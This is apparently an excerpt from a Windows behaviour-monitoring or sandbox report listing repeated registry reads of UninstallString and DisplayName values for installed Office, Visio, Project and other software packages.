| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002C-0409-0000-0000000FF1CE} | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002C-0409-0000-0000000FF1CE}_Office14.PRJPROR_{7CA93DF4-8902-449E-A42E-4C5923CFBDE3} | value_name = UninstallString, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002C-0409-0000-0000000FF1CE}_Office14.PRJPROR_{7CA93DF4-8902-449E-A42E-4C5923CFBDE3} | value_name = UninstallString, data = 34 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002C-0409-0000-0000000FF1CE}_Office14.PRJPROR_{7CA93DF4-8902-449E-A42E-4C5923CFBDE3} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002C-0409-0000-0000000FF1CE}_Office14.PRJPROR_{7CA93DF4-8902-449E-A42E-4C5923CFBDE3} | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002C-0409-0000-0000000FF1CE}_Office14.PROPLUSR_{7CA93DF4-8902-449E-A42E-4C5923CFBDE3} | value_name = UninstallString, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002C-0409-0000-0000000FF1CE}_Office14.PROPLUSR_{7CA93DF4-8902-449E-A42E-4C5923CFBDE3} | value_name = UninstallString, data = 34 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002C-0409-0000-0000000FF1CE}_Office14.PROPLUSR_{7CA93DF4-8902-449E-A42E-4C5923CFBDE3} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002C-0409-0000-0000000FF1CE}_Office14.PROPLUSR_{7CA93DF4-8902-449E-A42E-4C5923CFBDE3} | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0044-0409-0000-0000000FF1CE} | value_name = UninstallString, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0044-0409-0000-0000000FF1CE} | value_name = UninstallString, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0044-0409-0000-0000000FF1CE} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0044-0409-0000-0000000FF1CE} | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0054-0409-0000-0000000FF1CE} | value_name = UninstallString, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0054-0409-0000-0000000FF1CE} | value_name = UninstallString, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0054-0409-0000-0000000FF1CE} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0054-0409-0000-0000000FF1CE} | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0054-0409-0000-0000000FF1CE}_Office14.VISIOR_{CDC4310F-8189-485F-B47D-D972217CE173} | value_name = UninstallString, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0054-0409-0000-0000000FF1CE}_Office14.VISIOR_{CDC4310F-8189-485F-B47D-D972217CE173} | value_name = UninstallString, data = 34 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0054-0409-0000-0000000FF1CE}_Office14.VISIOR_{CDC4310F-8189-485F-B47D-D972217CE173} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0054-0409-0000-0000000FF1CE}_Office14.VISIOR_{CDC4310F-8189-485F-B47D-D972217CE173} | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-006E-0409-0000-0000000FF1CE} | value_name = UninstallString, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-006E-0409-0000-0000000FF1CE} | value_name = UninstallString, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-006E-0409-0000-0000000FF1CE} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-006E-0409-0000-0000000FF1CE} | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-006E-0409-0000-0000000FF1CE}_Office14.PRJPROR_{4560037C-E356-444A-A015-D21F487D809E} | value_name = UninstallString, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-006E-0409-0000-0000000FF1CE}_Office14.PRJPROR_{4560037C-E356-444A-A015-D21F487D809E} | value_name = UninstallString, data = 34 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-006E-0409-0000-0000000FF1CE}_Office14.PRJPROR_{4560037C-E356-444A-A015-D21F487D809E} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-006E-0409-0000-0000000FF1CE}_Office14.PRJPROR_{4560037C-E356-444A-A015-D21F487D809E} | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-006E-0409-0000-0000000FF1CE}_Office14.PROPLUSR_{4560037C-E356-444A-A015-D21F487D809E} | value_name = UninstallString, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-006E-0409-0000-0000000FF1CE}_Office14.PROPLUSR_{4560037C-E356-444A-A015-D21F487D809E} | value_name = UninstallString, data = 34 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-006E-0409-0000-0000000FF1CE}_Office14.PROPLUSR_{4560037C-E356-444A-A015-D21F487D809E} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-006E-0409-0000-0000000FF1CE}_Office14.PROPLUSR_{4560037C-E356-444A-A015-D21F487D809E} | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00A1-0409-0000-0000000FF1CE} | value_name = UninstallString, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00A1-0409-0000-0000000FF1CE} | value_name = UninstallString, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00A1-0409-0000-0000000FF1CE} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00A1-0409-0000-0000000FF1CE} | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00B4-0409-0000-0000000FF1CE} | value_name = UninstallString, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00B4-0409-0000-0000000FF1CE} | value_name = UninstallString, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00B4-0409-0000-0000000FF1CE} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00B4-0409-0000-0000000FF1CE} | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00B4-0409-0000-0000000FF1CE}_Office14.PRJPROR_{18A0C151-8F8A-4B68-A960-60C464B94329} | value_name = UninstallString, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00B4-0409-0000-0000000FF1CE}_Office14.PRJPROR_{18A0C151-8F8A-4B68-A960-60C464B94329} | value_name = UninstallString, data = 34 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00B4-0409-0000-0000000FF1CE}_Office14.PRJPROR_{18A0C151-8F8A-4B68-A960-60C464B94329} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00B4-0409-0000-0000000FF1CE}_Office14.PRJPROR_{18A0C151-8F8A-4B68-A960-60C464B94329} | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00BA-0409-0000-0000000FF1CE} | value_name = UninstallString, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00BA-0409-0000-0000000FF1CE} | value_name = UninstallString, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00BA-0409-0000-0000000FF1CE} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00BA-0409-0000-0000000FF1CE} | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0115-0409-0000-0000000FF1CE} | value_name = UninstallString, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0115-0409-0000-0000000FF1CE} | value_name = UninstallString, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0115-0409-0000-0000000FF1CE} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0115-0409-0000-0000000FF1CE} | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0115-0409-0000-0000000FF1CE}_Office14.PRJPROR_{4560037C-E356-444A-A015-D21F487D809E} | value_name = UninstallString, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0115-0409-0000-0000000FF1CE}_Office14.PRJPROR_{4560037C-E356-444A-A015-D21F487D809E} | value_name = UninstallString, data = 34 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0115-0409-0000-0000000FF1CE}_Office14.PRJPROR_{4560037C-E356-444A-A015-D21F487D809E} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0115-0409-0000-0000000FF1CE}_Office14.PRJPROR_{4560037C-E356-444A-A015-D21F487D809E} | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0115-0409-0000-0000000FF1CE}_Office14.PROPLUSR_{4560037C-E356-444A-A015-D21F487D809E} | value_name = UninstallString, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0115-0409-0000-0000000FF1CE}_Office14.PROPLUSR_{4560037C-E356-444A-A015-D21F487D809E} | value_name = UninstallString, data = 34 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0115-0409-0000-0000000FF1CE}_Office14.PROPLUSR_{4560037C-E356-444A-A015-D21F487D809E} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0115-0409-0000-0000000FF1CE}_Office14.PROPLUSR_{4560037C-E356-444A-A015-D21F487D809E} | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0117-0409-0000-0000000FF1CE} | value_name = UninstallString, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0117-0409-0000-0000000FF1CE} | value_name = UninstallString, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0117-0409-0000-0000000FF1CE} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0117-0409-0000-0000000FF1CE} | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{91140000-0011-0000-0000-0000000FF1CE} | value_name = UninstallString, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{91140000-0011-0000-0000-0000000FF1CE} | value_name = UninstallString, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{91140000-0011-0000-0000-0000000FF1CE} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{91140000-0011-0000-0000-0000000FF1CE} | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{91140000-003B-0000-0000-0000000FF1CE} | value_name = UninstallString, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{91140000-003B-0000-0000-0000000FF1CE} | value_name = UninstallString, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{91140000-003B-0000-0000-0000000FF1CE} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{91140000-003B-0000-0000-0000000FF1CE} | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{91140000-003B-0000-0000-0000000FF1CE}_Office14.PRJPROR_{8A8F117F-8EDB-440D-B679-F08909D729F7} | value_name = UninstallString, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{91140000-003B-0000-0000-0000000FF1CE}_Office14.PRJPROR_{8A8F117F-8EDB-440D-B679-F08909D729F7} | value_name = UninstallString, data = 34 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{91140000-003B-0000-0000-0000000FF1CE}_Office14.PRJPROR_{8A8F117F-8EDB-440D-B679-F08909D729F7} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{91140000-003B-0000-0000-0000000FF1CE}_Office14.PRJPROR_{8A8F117F-8EDB-440D-B679-F08909D729F7} | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{91140000-0057-0000-0000-0000000FF1CE} | value_name = UninstallString, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{91140000-0057-0000-0000-0000000FF1CE} | value_name = UninstallString, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{91140000-0057-0000-0000-0000000FF1CE} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{91140000-0057-0000-0000-0000000FF1CE} | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{91140000-0057-0000-0000-0000000FF1CE}_Office14.VISIOR_{01D8AE4B-A04D-47E5-81BF-E3F98B81B8C3} | value_name = UninstallString, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{91140000-0057-0000-0000-0000000FF1CE}_Office14.VISIOR_{01D8AE4B-A04D-47E5-81BF-E3F98B81B8C3} | value_name = UninstallString, data = 34 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{91140000-0057-0000-0000-0000000FF1CE}_Office14.VISIOR_{01D8AE4B-A04D-47E5-81BF-E3F98B81B8C3} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{91140000-0057-0000-0000-0000000FF1CE}_Office14.VISIOR_{01D8AE4B-A04D-47E5-81BF-E3F98B81B8C3} | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033 | value_name = UninstallString, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033 | value_name = UninstallString, data = 67 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033 | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033 | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9BE518E6-ECC6-35A9-88E4-87755C07200F} | value_name = UninstallString, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9BE518E6-ECC6-35A9-88E4-87755C07200F} | value_name = UninstallString, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9BE518E6-ECC6-35A9-88E4-87755C07200F} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9BE518E6-ECC6-35A9-88E4-87755C07200F} | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AA0000000001} | value_name = UninstallString, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AA0000000001} | value_name = UninstallString, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AA0000000001} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AA0000000001} | value_name = DisplayName, data = 65 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B175520C-86A2-35A7-8619-86DC379688B9} | value_name = UninstallString, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B175520C-86A2-35A7-8619-86DC379688B9} | value_name = UninstallString, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B175520C-86A2-35A7-8619-86DC379688B9} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B175520C-86A2-35A7-8619-86DC379688B9} | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB} | value_name = UninstallString, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB} | value_name = UninstallString, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB} | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{e6e75766-da0f-4ba2-9788-6ea593ce702d} | value_name = UninstallString, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{e6e75766-da0f-4ba2-9788-6ea593ce702d} | value_name = UninstallString, data = 34 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{e6e75766-da0f-4ba2-9788-6ea593ce702d} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{e6e75766-da0f-4ba2-9788-6ea593ce702d} | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5} | value_name = UninstallString, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5} | value_name = UninstallString, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5} | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757 | value_name = UninstallString, type = REG_NONE |
|
3 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173 | value_name = UninstallString, type = REG_NONE |
|
3 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860 | value_name = UninstallString, type = REG_NONE |
|
3 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655 | value_name = UninstallString, type = REG_NONE |
|
3 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743 | value_name = UninstallString, type = REG_NONE |
|
3 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063 | value_name = UninstallString, type = REG_NONE |
|
3 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573 | value_name = UninstallString, type = REG_NONE |
|
3 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{f325f05b-f963-4640-a43b-c8a494cdda0f} | value_name = UninstallString, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{f325f05b-f963-4640-a43b-c8a494cdda0f} | value_name = UninstallString, data = 34 |
|
1 | |
